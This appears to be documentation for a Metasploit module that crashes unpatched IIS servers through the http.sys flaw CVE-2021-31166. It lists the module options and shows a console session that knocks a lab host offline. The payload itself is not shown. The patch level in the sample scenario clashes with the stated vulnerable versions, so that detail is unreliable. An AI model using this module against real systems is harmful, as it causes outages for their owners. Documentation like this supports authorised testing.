rb_dos_iis_2021_31166.md

Vulnerable Application

IIS web server on Windows 10 and Windows Server, versions 20H2 and 2004, without KB5003173.

This module exploits CVE-2021-31166, a use-after-free (UAF) bug in http.sys that Microsoft patched in May 2021, to cause a BSOD and crash the target IIS server.

Options

RHOST

  • Required
  • Type: address
  • No default value

IP address or hostname of the target IIS server.

RPORT

  • Required
  • Type: integer
  • Default value: 80

The port on the target server where IIS is running.

TARGETURI

  • Optional
  • Type: string
  • Default value: /

The base URL of the IIS install on the target server.

Scenarios

Windows 10 20H2 19042.804 running IIS with November 22, 2021 Patches (KB5007253)

msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > show options

Module options (auxiliary/windows/iis/rb_dos_iis_2021_31166):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the IIS Server.
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 192.168.56.9
RHOST => 192.168.56.9
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 192.168.56.9

[*] Connecting to target to make sure its alive...
[+] Successfully connected to target. Sending payload...
[+] Payload was sent to the target server. Checking that the server is down...
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > 
